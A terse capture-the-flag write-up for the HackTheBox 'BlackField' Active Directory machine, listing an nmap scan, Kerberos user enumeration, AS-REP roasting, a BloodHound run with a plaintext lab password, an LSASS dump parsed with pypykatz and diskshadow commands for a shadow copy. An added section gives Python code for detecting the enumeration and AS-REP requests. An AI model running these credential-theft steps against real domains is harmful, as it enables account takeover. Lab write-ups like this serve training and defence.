HackTheBox-BlackField

NMAP

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-01 02:43:13Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
49676/tcp open  msrpc         Microsoft Windows RPC
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

PORT 139/445 (SMB)

Foothold

/opt/kerbrute/kerbrute_linux_amd64 userenum -d BLACKFIELD.local users.txt --dc 10.10.10.192
python3 /opt/impacket/examples/GetNPUsers.py -no-pass -dc-ip 10.10.10.192 -usersfile users.txt BLACKFIELD/abc
python3 /opt/Python-Bloodhound/bloodhound.py -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -c all -ns 10.10.10.192
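
Added example (not part of the original writeup): the userenum and GetNPUsers steps above show up on the domain controller as Windows Security event 4768, and this Python code flags both patterns in a set of such events. The sample records, source addresses, the user names alice/bob/carol/dave, and the threshold and window values are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records using field names from Security event 4768 (TGT requested).
# Failure events are only logged when "Audit Kerberos Authentication Service"
# failure auditing is enabled on the domain controller.
ATT, WS = "::ffff:10.10.14.5", "::ffff:10.10.10.77"  # made-up source addresses
EVENTS = [
    {"time": "2022-01-01T02:50:01", "TargetUserName": "alice", "IpAddress": ATT, "Status": "0x6", "PreAuthType": "0"},
    {"time": "2022-01-01T02:50:02", "TargetUserName": "bob", "IpAddress": ATT, "Status": "0x6", "PreAuthType": "0"},
    {"time": "2022-01-01T02:50:03", "TargetUserName": "carol", "IpAddress": ATT, "Status": "0x6", "PreAuthType": "0"},
    {"time": "2022-01-01T02:51:10", "TargetUserName": "support", "IpAddress": ATT, "Status": "0x0", "PreAuthType": "0"},
    {"time": "2022-01-01T02:52:00", "TargetUserName": "audit2020", "IpAddress": WS, "Status": "0x0", "PreAuthType": "2"},
    {"time": "2022-01-01T02:53:00", "TargetUserName": "dave", "IpAddress": WS, "Status": "0x6", "PreAuthType": "0"},
]

def find_asrep_requests(events):
    """TGTs issued without pre-authentication: Status 0x0 with PreAuthType 0.

    Normal logons use a non-zero type (2 = encrypted timestamp), so these
    point at accounts with "Do not require Kerberos preauthentication" set.
    """
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e["Status"] == "0x0" and e["PreAuthType"] == "0"]

def find_enumeration(events, threshold=3, window=timedelta(seconds=60)):
    """Sources requesting >= threshold distinct unknown principals (0x6) in window."""
    by_ip = defaultdict(list)
    for e in events:
        if e["Status"] == "0x6":  # KDC_ERR_C_PRINCIPAL_UNKNOWN
            by_ip[e["IpAddress"]].append(
                (datetime.fromisoformat(e["time"]), e["TargetUserName"]))
    flagged = []
    for ip, hits in by_ip.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            names = {n for t, n in hits[i:] if t - start <= window}
            if len(names) >= threshold:
                flagged.append(ip)
                break
    return flagged

if __name__ == "__main__":
    print("AS-REP without pre-auth:", find_asrep_requests(EVENTS))
    print("Username enumeration sources:", find_enumeration(EVENTS))
```

Accounts reported by find_asrep_requests should have pre-authentication re-enabled, and their passwords rotated if the request came from an unexpected host.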

Privilege Escalation (Audit2020)

Privilege Escalation (svc_backup)

/usr/local/bin/pypykatz lsa minidump lsass.DMP

Privilege Escalation (Administrator)

set context persistent nowriters
set metadata C:\temp\metdata.cab
set verbose on
add volume C: alias uwu
create
expose %uwu% f:


Pentester | CTF Player

ARZ101
